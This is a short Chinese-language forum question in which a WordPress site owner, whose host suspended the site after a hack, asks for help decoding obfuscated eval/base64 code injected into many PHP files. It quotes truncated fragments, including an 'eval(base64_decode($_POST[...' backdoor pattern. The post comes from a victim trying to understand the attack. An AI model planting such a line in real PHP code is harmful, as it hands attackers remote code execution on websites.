我的Wordpress网站被黑了,最近被主持人暂停了。
我正在浏览3000多个.php文件,并发现许多文件被“ eval ”和“ base64 ”代码注入感染。我知道有一种方法可以解码代码并查看黑客实际上在尝试做什么,在我的情况下“将数据从我的网站发布到他的电子邮件地址”。
以下是来自黑客1000行的一批base64代码示例:如果可能的话,可以很好地了解它的后果:(我在线尝试了几个base64解码器,但他们仍在发出加密代码)。请检查以下代码:
第一批:
<?php ${"\x47L\x4f\x42A....."}
其他批次:
eval(base64_decode($_POST["\x63od\x.... ;
提前致谢:)